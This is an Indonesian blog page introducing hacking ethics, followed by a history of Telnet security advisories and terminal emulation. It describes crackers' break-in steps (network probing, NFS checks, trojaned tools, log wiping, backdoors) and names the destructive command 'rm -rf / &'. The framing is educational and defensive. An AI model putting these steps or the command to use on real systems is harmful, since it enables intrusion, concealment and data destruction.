Tampilkan postingan dengan label Belajar hack memakai notepad. Tampilkan semua postingan
Tampilkan postingan dengan label Belajar hack memakai notepad. Tampilkan semua postingan

Belajar Menjadi Hacker
Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.
Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.
Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.
Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.
Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).


Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls <domain or network>’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn <user>’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.


Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.


Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.


Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.


so pahami dlu filosopi nya ..baru dech berkoar-koar. jangan sampai jadi sok and ngaku-ngaku suka hacking kalo ngk tau tetek bengek nya..okey

Sejarah Perhackingan Dunia Telnet

Bab ini menguji serangan yang dilakukan selama bertahun-tahun dalam penggunaan layanan Telnet. Pengujian dimulai dengan sekelumit sejarah. Protokol Telnet pertama kali diperkenalkan oleh Postel di tahun 1980. Dalam RFC 764, sebagaimana dituliskan oleh seseorang bernama Postel:

Tujuan dari protokol Telnet adalah untuk berfungsi secara umum, dua arah, fasilitas komunikasi yang berorientasi 8 bit. Tujuan utamanya adalah untuk mengijinkan metode standar dari perangkat terminal antar-muka dan pengolahan berorientasi terminal yang satu dengan yang lainnya. Visinya bahwa protokol tersebut dapat juga digunakan sebagai komunikasi antar terminal (“linking”) dan komunikasi antar proses (komputasi terdistribusi).
———————————————————————————
Referensi Silang : RFC 764 dapat ditemukan pada http://sunsite.auc.dk/RFC/rfc/rfc764.html
———————————————————————————-
Telnet
Sebagaimana yang saya sebutkan pada ulasan “Penjelasan TCP/IP”, Telnet tergolong unik yang dirancang dengan mengecualikan pencatatan rlogin. Telnet dirancang untuk memungkinkan seorang user log in ke mesin lain dan mengeksekusi perintah disana. Telnet (seperti halnya rlogin) bekerja seperti halnya antara anda pada konsol mesin remote tersebut, seolah-olah anda secara fisik berada di depan mesin remote tersebut, menyalakan, dan mulai bekerja.————————————————————————————————————
CATATAN: Pengguna PC bisa membayangkan hal yang sama dengan software PCAnywhere atau CloseUp. Program ini memungkinkan anda login secara remote ke PC lainnya dan mengeksekusi perintah pada C: prompt mesin remote tersebut (atau bahkan mengeksekusi perintah pada Windows, menyediakan anda koneksi berkecepatan tinggi untuk mengirimkan data grafis melalui kabel).
———————————————————————————————————–


Virtual Terminal
Keajaiban dibalik Telnet berupa pemalsuan suatu koneksi terminal ASCII diantara dua mesin yang berjauhan satu dengan yang lainnya. Hal ini bisa terjadi dengan menggunakan sebuah virtual terminal sebagaimana yang dijelaskan oleh Postel (dikutip dari RFC 854 )
Saat suatu koneksi telnet pertama kali terjadi, setiap ujungnya menganggap asli dan terhenti pada sebuah “Network Virtual Terminal” atau NVT. Sebuah NVT merupakan perangkat imajiner yang menyediakan sebuah standar, network-wide, perantara yang menggambarkan suatu terminal sebenarnya… Network Virtual Terminal (NVT) merupakan perangkat karakter dua arah. NVT memiliki sebuah printer dan keyboard. Printer tersebut merespon data yang masuk dan keyboard menghasilkan data keluaran yang dikirim melalui koneksi Telnet tersebut dan, jika “echo” merupakan hal yang diinginkan, sama halnya dengan printer NVT. Echo tidak diharapkan untuk melintasi jaringan tersebut (meski, opsi tersebut ada untuk mengaktifkan suatu mode operasi “remote” echo, tidak diperlukan host (untuk mengimplementasikan opsi ini). Code tersebut di set berupa 7-bit USASCII dalam suatu 8-bit, kecuali jika telah dimodifikasi. Konversi kode apapun dan pertimbangan waktu merupakan masalah lokal dan tidak berpengaruh pada NVT tersebut.

—————————————————————————————————————

Referensi Silang: Baca RFC 854 pada http://sunsite.auc.dk/RFC/rfc/rfc854.html


—————————————————————————————————————

Sebuah virtual terminal sama halnya dengan (atau mirip dengan) koneksi kabel serial antara dua mesin. Sebagai contoh, anda dapat mensimulasikan sesuatu yang mirip dengannya ke sebuah sesi Telnet dengan tanpa uncommenting instruksi respawn pada file inittab di sistem Linux (dan sebagian besar sistem UNIX) atau dengan mendiskoneksikan keyboard dan monitor pada sebuah SPARC dan menghubungkan terminal VT200 kedalam serial A atau B. Pertama, sebuah login: prompt akan ditampilkan. Yang kedua, seluruh pesan proses boot merupakan echo ke terminal yang terhubung dan berakhir, sebuah boot prompt ditampilkan (atau mungkin, jika disk drive SCSI ditentukan sebagai boot device pada PROM, mesin tersebut akan melakukan boot dan menampilkan login: prompt).


Oleh karena itu, koneksi berbasis Telnet merupakan apa yang disebut dengan koneksi bare-bone. Anda dapat memperhatikan bahwa jika anda menggunakan terminal VT220 sebagai puncak pada SPARC anda, saat terjadi proses boot, logo Sun yang keren tersebut tidak akan tercetak berwarna, tidak ada tampilan grafis yang bagus yang terlihat. Telnet dan sesi terminal benar-benar berbasiskan teks. Sebagai tambahan, koneksi telnet tidak memiliki fasilitas untuk menginterpretasikan bahasa berorientasi-tampilan seperti HTML tanpa bantuan sebuah browser berbasis teks seperti Lynx. Oleh sebab itu, memanggil suatu halaman Web melalui Telnet tidak akan menampilkan gambar atau teks yang berbentuk indah; hanya merupakan source dokumen tersebut (terkecuali bisa, anda login via telnet dan kemudian menggunakan Lynx).


—————————————————————————————————————

NOTE: Lynx benar-benar merupakan browser HTML berbasis terminal yang digunakan dengan shell-account atau koneksi TCP/IP berbasis DOS. Hanya dengan inilah cara satu-satunya untuk mengakses World Wide Web.


—————————————————————————————————————

Sejarah Keamanan Telnet

Telnet memiliki sejumlah security advisories yang banyak. Masalah keamanan Telnet yang muncul sangat banyak, sebagian besar celah keamanan umumnya pada kesalahan pemrograman. Bagaimanapun juga, kesalahan pemrograman bukan satu-satunya alasan mengapa Telnet ada dalam advisories. Pada bulan Agustus 1989, sebagai contoh, masalah tersebut berupa Trojan, sebagaimana yang disebutkan pada CERT advisory “Telnet Break-in Warning” :


Banyak komputer yang terhubung ke Internet saat ini mengalami aktifitas sistem yang tidak terotorisasi. Penyelidikan menunjukkan bahwa aktifitas tersebut terjadi selama beberapa bulan dan meluas. Beberapa komputer UNIX yang memiliki program “Telnet” terpaksa diganti dengan versi “Telnet” yang melog sesi outgoing login (termasuk username dan password untuk sistem remote). Terlihat bahwa akses tersebut telah menguasai berbagai mesin yang terlihat dalam beberapa sesi log-nya.


————————————————————————————————————–

Referensi Silang: Untuk melihat CERT advisory ini silakan kunjungi ftp://ftp.uwsg.indiana.edu/pub/security/cert/cert_advisories/CA-89:03.telnet.breakin.warning

—————————————————————————————————————

Serangan yang terjadi terlebih dahulu dinyatakan oleh DDN Security Coordination Center (September 1989), jadi sekelumit dokumentasi mengenai apakah hal tersebut berpengaruh pada komputer pemerintah. Selain itu, meskipun usaha CERT merupakan apresiasi dan penting bagi keamanan Internet, Advisory DDN juga berisikan analisa teknis tentang penanganan masalah tersebut.


Pada bulan Maret, 1991, telnetd daemon pada distribusi Sun ditemukan memiliki celah keamanan. Sebagaimana yang tertulis pada CERT advisory “Sun OS in .telnetd Vulnerability”.


The Computer Emergency Response Team/Coordination Center (CERT/CC) telah memperoleh informasi dari Sun Microsystem, Inc. berkenaan dengan celah keamanan yang mempengaruhi SunOS versi 4.1 dan 4.1.1 pada in.telnetd pada seluruh arsitektur Sun 3 dan 4. Celah keamanan ini juga mempengaruhi SunOS versi 4.0.3 pada in.telnetd dan in.rlogind pada seluruh arsitektur Sun 3 dan 4. Sepanjang pengetahuan kami, celah keamanan tidak ada pada SunOS versi 4.1 dan 4.1.1 pada in.rlogind. Celah keamanan telah diperbaiki oleh Sun Microsystems, Inc.

—————————————————————————————————————


Referensi Silang: Untuk melihat CERT advisory ini ada dapat mengujungi ftp://info.cert.org/pub/cert_advisories/CA-91%3A02a.SunOS.telnetd.vulnerability

—————————————————————————————————————


TIP: Jika anda membeli Sun 3/60 melalui Internet, dan anda bisa mendapatkan patch tersebut, yang disertakan advisory sebelumnya.

—————————————————————————————————————
Berbulan-bulan kemudian, telah ditetapkan bahwa sebuah aplikasi yang dikhususkan LAT/Telnet dikembangkan oleh Digital Corporation telah terjadi pelanggaran keamanan. Sebagaimana yang disebutkan pada CERT advisory-nya “ULTRIK LAT/Telnet Gateway Vulnerability”:


Pelanggaran keamanan terjadi pada sistem ULTRIX 4.1 dan 4.2 yang dijalankan software LAT/Telnet Gateway yang memungkinkan akses privilese yang tidak sah… siapapun yang mengakses suatu terminal atau modem yang terhubung pada LAT server yang dijalankan LAT/Telnet service, bisa mendapatkan root privilese yang tidak sah.


—————————————————————————————————————

Referensi Silang: Untuk melihat CERT advisory ini silakan kunjungi: ftp://info.cert.org/pub/cert_advisories/CA-91%3A11.Ultrix.LAT-Telnet.gateway.vulnerability

—————————————————————————————————————
Masalah Telnet pertama kali yang beredar di kalangan orang-orang awam yang terhubung ke suatu distribusi dari client NCSA Telnet melalui mesin PC dan MacIntosh. Jadi tidak terjadi kesalahpahaman disini, ini berupa sebuah client aplikasi Telnet yang menyertakan sebuah FTP server didalamnya. Celah tersebut meluas terutama dari user yang kurang memahami bagaimana aplikasi tersebut bekerja. Sebagaimana yang dijelaskan oleh orang-orang DDN:

Konfigurasi default dari NCSA Telnet pada MacIntosh dan PC memiliki masalah keamanan serius dalam pengimplementasian sebuah FTP server… Siapapun pengguna Internet dapat terhubung melalui FTP ke suatu PC atau MacIntosh yang menjalankan konfigurasi default NCSA Telnet dan mendapatkan akses baca dan tulis yang tidak absah ke berbagai file, termasuk file-file sistem.

Masalah tersebut terkait dengan sebuah file opsi konfigurasi yang memungkinkan seseorang meng-enable atau mendisable-kan FTP server. Kebanyakan user beranggapan bahwa jika pernyataan enable server tersebut tidak ada, maka server tersebut tidak bekerja. Hal ini merupakan kesalahan. Dengan menghilangkan baris tersebut (atau menambahkan opsi baris ftp=yes), maka Anda mengijinkan seseorang yang tidak diinginkan mengakses baca-tulis pada hard disk anda.

Saya mengharapkan hal ini akan menjelaskan argumentasi yang menganggap apakah seorang pengguna PC dapat diserang dari luar. Masalah ini menjadi diskusi hangat di Usenet. NCSA Telnet hanya membuat celaka seseorang pada beberapa situasi dimana seorang pengguna PC atau Mac dapat diserang dari luar. Jadi tergantung pada situasinya, rata-rata pengguna komputer dirumah dapat menjadi korban serangan dari luar. Orang tersebut dapat membaca, menghapus file anda dan seterusnya.

Apa yang lebih menarik adalah bahwa hingga hari ini, mereka yang menggunakan aplikasi NCSA telnet memiliki beberapa resiko, bahkan jika mereka hanya mengijinkan akses ke FTP server pada seseorang yang terotorisasi. Jika seorang cracker mendapatkan dari korbannya suatu username dan password yang valid (dan cracker tersebut juga merupakan seorang user yang terotorisasi), cracker tersebut bisa saja mendapatkan file FTPPASS. File ini merupakan suatu file otentikasi dimana username dan password para user tersimpan. Password yang terenkripsi dalam file ini mudah sekali dicrack.

Username pada file ini tidak tersimpan dalam bentuk terenkripsi (hanya beberapa program mengenkripsi usernamenya). Password tersebut terenkripsi, namun skema enkripsinya memiliki implementasi yang kurang baik. Sebagai contoh, jika password tersebut kurang dari 6 karakter, maka hanya perlu beberapa detik untuk mengcrack. Kenyataannya, seseorang dengan mudahnya dapat mengcrack password tersebut hanya dengan 14 baris program BASIC.

————————————————————————————————————-
Referensi Silang: program BASIC untuk mengcrack passwords dapat dijumpai di http://www.musa.it/gorgo/txt/NCSATelnetHack.txt.

————————————————————————————————————-

Jika anda seorang pengguna PC atau MAC yang menggunakan NCSA Telnet (dengan FTP server), jangan ijinkan seluruh akses FTP ke semua orang yang tidak anda percayai. Jika anda mengabaikan peringatan ini, mungkin anda telah di crack. Bayangkan suatu skenario dimana seseorang pada suatu jaringan yang menggunakan NCSA Telnet. Bahkan jika sisa jaringan tersebut tergolong aman, hal ini akan menyerang keamanan bagian tersebut. Terlebih lagi, aplikasi tersebut tidak menampilkan log (dalam keadaan normal) dan oleh karena itu, tidak meninggalkan jejak. Jaringan apapun yang menjalankan aplikasi ini dapat diserang, dilumpuhkan dan dirusak, dan tak seorangpun dapat mengidentifikasi penyerangnya.

Kebanyakan celah keamanan Telnet telah penah ditemukan, yang berkenaan dengan opsi yang melalui environmet variable. Buletin DDN telah mempostingnya pada tanggal 20 November 1995:

Suatu celah keamanan yang terdapat dalam beberapa versi Telnet daemon yang mendukung RFC 1408 atau 1572, yang keduanya berjudul “Telnet Environment Option”, yang dijalankan pada sistem tersebut juga mendukung shared object libraries…Local dan remote user dengan atau tanpa local account bisa mendapatkan root access ke sistem target.


Sebagian situs yang memiliki celah keamanan ini. Agar memahami masalahnya, anda harus memahami istilah environment. Dalam bahasa UNIX, umumnya merujuk ke lingkungan shell tersebut (adalah bahwa, shell apa yang mungkin anda gunakan sebagai default, apa terminal emulation yang anda gunakan dan seterusnya).

————————————————————————————————————


CATATAN: Pengguna DOS/Windows dapat dengan mudahnya memahami pemikiran ini pada file AUTOEXEC.BAT dan CONFIG.SYS. Sebagai contoh, variabel yang dibuat menggunakan perintah SET, seperti pada SET PATH=C:\;C:\WINDOWS; (PATH environment variable merupakan salah satu dari beberapa yang dapat dispesifikasikan dalam DOS environment). Pernyataan ini yang menentukan apakah lingkungan pemrograman anda akan seperti saat anda memboot-nya ke dalam mode perintah. Beberapa environment variable umum yang bisa diset dengan cara ini merupakan shell yang anda gunakan, path, time zone dan seterusnya.


————————————————————————————————————–
Perubahan Environment

Pada UNIX, anda dapat menampilkan atau mengubah environment tersebut dengan menggunakan salah satu perintah setenv atau printenv. Berikut ini contoh yang mungkin terdapat pada sebuah instruksi:


> setenv
ignoreeof=10
HOSTNAME=samshacker.samshack.net
LOGNAME=tr
MINICOM=-c on
MAIL=/spool/mail/samshack
TERM=ansi
HOSTTYPE=i386-linux
PATH=/usr/local/bin:/bin:/usr/bin:.:/sbin:/usr/sbin:.
HOME=/usr/local/etc/web-clients/samshacker/./
SHELL=/bin/bash
LS_OPTIONS=–8bit –color=tty -F -T 0
PS1=\h:\w\$
PS2=>
TAPE=/dev/nftape
MANPATH=/usr/local/man:/usr/man/preformat:/usr/man:/usr/X11/man:/usr/openwin/man
LESS=-MM
OSTYPE=Linux
OPENWINHOME=/usr/openwin
SHLVL=2
BASH=/bin/bash
LS_COLORS=
_=/bin/csh
PWD=/usr/local/etc/web-clients/samshacker/./
USER=tr
HOST=samshack
Listing tersebut merupakan output yang sangat ekstensif dari perintah pada mesin yang memiliki sebuah virtual domain. Sebuah versi yang lebih mudah diatur (dan lebih mudah dicerna) dapat diambil dari shell mesin yang sebenarnya. Berikut ini outputnya:

samshacker% /usr/ucb/printenv

HOME=/home/hacker
HZ=100
LOGNAME=hacker
MAIL=/var/mail/hacker
PATH=/usr/bin:
SHELL=/sbin/sh
TERM=ansi
TZ=US/Pacific
PWD=/home/hacker
USER=hacker
Output ini berasal dari SPARCstation 10 dimana saya mengeset sebuah shell account tiruan (output pertama berasal dari sistem Linux). Hal ini merupakan environment yang ideal. Pernyataan PATH (baris 6) merujuk hanya ke /usr/bin. Dalam prakteknya, hal ini tentu saja tidak berguna karena terdapat banyak berkas biner pada sistem UNIX yang kesemuanya ditempatkan pada /usr/bin. Sebagai contoh, berbagai macam biner ditempatkan dalam /usr/sbin, /usr/bin/X11, dan seterusnya. Anda dapat melihat, sebagai contoh, bahwa even perintah yang diberikan (setenv) dilakukan dengan menggunakan pernyataan path mutlak (/usr/ucb/setenv). Dalam prakteknya, saya telah (selama lebih dari sehari) menetapkan path yang lebih panjang, yang merujuk ke halaman utama, biner, dan mungkin termasuk berbagai direktori.

—————————————————————————————————————

CATATAN: Pernyataan PATH pada UNIX bekerja hampir sama dengan DOS. Direktori yang anda peruntukkan untuk berada dalam path harus diartikulasi pada baris pernyataan PATH dan dipisahkan oleh tanda titik dua (sebagai ganti dari titik koma). Dengan artikulasi ini pada baris PATH, anda memberikan user akses ke perintah dalam direktori ini (tidak masalah berada pada direktori yang mana user tersebut berada).


—————————————————————————————————————


Terminal Emulation

Variable lain yang ditetapkan dalam pernyataan pemrosesan termasuk HOME, MAIL, SHELL dan TERM. TERM, salah satu dari variabel yang sangat penting, yang mengekspresikan jenis terminal emulation yang akan anda gunakan. Kerena tidak seluruh pembaca mengetahui apakah terminal emulation tersebut, saya akan menjelaskannya dengan ringkas.

BertAun-tahun yang lalu, sebagian besar server yang berupa mainframe. Pada saat itu, user tidak memiliki PC yang powerful yang dihubungkan ke mainframe tersebut; mereka memiliki terminal, yang (biasanya) berupa kotak tanpa hard disk. Disini terdapat layar yang dihubungkan ke keyboard. Dibalik terminal terdapat konektor serial, yang mungkin memiliki metode koneksi yang berbeda. Salah satu metode yang terkenal saat itu adalah koneksi serial bare-bone (kami membicarakan bentuk primitifnya disini: yakni sebuah interface serial-to-serial langsung). Terminal jenis lain mungkin mendukung opsi kabel seperti koneksi Ethernet.













Pada berbagai peristiwa, terminal ini memiliki fungsi yang sedikit (setidaknya jika dibandingkan dengan PC pada umumnya). Berisikan mainboard seperti sebuah terminal yang memiliki sebagian kecil memory dan firmware (software hardware di dalam board itu sendiri). Firmware akan memastikan user tersebut beberapa opsi. Sebagai contoh, seseroang dapat mengatur kecepatan dan jenis koneksi, yang diperlukan untuk local echo dan seterusnya. Terkadang, terdapat opsi-opsi yang diatur pada jenis printer yang mungkin digunakan atau bahkan port apakah yang digunakan dgunakan untuk mengirim data.













————————————————————————————————————-













TIP: Sebagaimana halnya terminal yang masih dijual pada Usenet Newsgroup teretntu. Jika anda mahasiswa dengan dana cekak dan anda memiliki koneksi Ethernet atau koneksi serial pada server kampus anda, dan jika server account tersebut merupakan sebuah shell account, menerima suatu terminal. Maka hanya dengan $25-40, anda dapat memperoleh akses internet berkecepatan tinggi. Sebenarnya, anda tidak bisa secara umum menyimpan material ke dalam sebuah disk, namun anda dapat mencetak apa yang terjadi pada layar saat itu. Anda tidak akan percaya betapa cepatnya layar tersebut diupdate. Situasi yang benar-benar ideal untuk Internet Relay Chat (IRC). Box ini tergolong kecil, murah dan handal.













—————————————————————————————————————













Dua terminal yang terkenal adalah Tektronix 4020 dan VT100 (juga IBM 3270, yang sedikit berbeda). Masing-masing memiliki pengaturan jumlah karakter perbaris dan baris per layar yang dapat ditampilkan. Dalam kenyataannya, kebanyakan terminal biasanya memiliki dua setting. Agar terminal menjadi lebih disukai, seseorang juga dapat menentukan kolom dan grafis (Tektronix telah berorientasi grafis).













Karena terminal ini menjadi metode standar koneksi ke mainframe, mereka juga memasuki dunia UNIX. Sebagaimana halnya, seluruh sistem operasi UNIX memiliki keyboard dan screen mapping (pemetaan layar). Maaping merupakan gambaran dari layar dan setting keyboard (sebagai contoh, berapa banyak baris dan kolom per layar, atau yang lebih penting, Kombinasi Ctrl + Key apa yang menggambarkan karakter khusus). Hal ini diperlukan karena terminal tertentu menggunakan lebih dari key yang diberikan pada standar keyboard PC atau Mac. Terlebih pada keyboard typewriter dengan tombol F function, yang disana mungkin berupa tombol P yang menampilkan tindakan khusus, termasuk aktivasi menu dan navigasi kursor layar pada database. Untuk menampilkan hal yang sama pada keyboard PC, Mac atau beberapa UNIX keyboard, kombinasi tombol Ctrl+Esc telah ditentukan sama dengan tombol P. Penandaan tombol ini dikenal dengan key binding, yagn merupakan pernyataan yang dibuat dalam kode program yang menentukan apa yang terjadi jika hal ini atau kombinasi tombol tersebut di eksekusi. Key binding merupakan hal terpenting dalam pemrograman, khususnya bahasa C dimana anda memberikan seuatu interface semi-grafis (sebagai contoh, dimana anda menggunakan library TurboVision-nya Borland yang terkenal itu untuk membuat drop-down menu pada suatu aplikasi DOS).













Seseorang dapat secara umum menentukan key binding dalam sebuah program (setidaknya, menuliskannya dengan baik). Yang memberikan pengguna kendali application-level terhadap tombol mana yang melakukan apa. Sebagai contoh, mungkin user tersebut dapat menentukan binding dari tombol Ctrl + F untuk menampilkan berbagai jenis fungsi. Beberapa aplikasi tertentu menanyakan pengguna untuk melakukan hal tersebut sebelum menjalankan program tersebut untuk pertama kalinya. Terdapat lebih dari satu program—sebuah freeware editor untuk UNIX, yang ditulis dalam bahasa Jerman—yang memungkinkan anda untuk memetakan kembali keyboard secara lengkap.













Dalam UNIX, terminal mapping pada umumnya tersimpan dalam file yang disebut termcap. Library termcap, menurut laporan diperkenalkan dengan Berkeley UNIX, yang merupakan tambahan penting dalam sistem tersebut. Tanpa hal itu, banyak mesin yang tidak akan berkomunikasi dengan baik satu sama lainnya. Sebagai contoh, jika anda melakukan suatu fresh install pada sistem operasi Linux dan tidak melakukan apapun untuk menggunakan variabel TERM, yang akan diset ke Linux. Jika anda kemudian melakukan Telnet ke sebuah SPARCstation (atau mesin lain yang juga memiliki konfigurasi TERM default), maka anda tidak mampu membersihkan layar dengan perintah clear. Hal ini dikarenakan dua setting terminal emulation tidak kompatibel. Lebih jauhlagi, jika anda mencoba menjalankan sebuah program seperti PINE—yang mengandalkan kompatibilitas jenis terminal—maka program tersebut akan mengalami error, yang menandakan bahwa terminal tersebut tidak di dukung. (sistem SysV secara tradisional mengunakan terminfo sebagai lawan dari termcap).













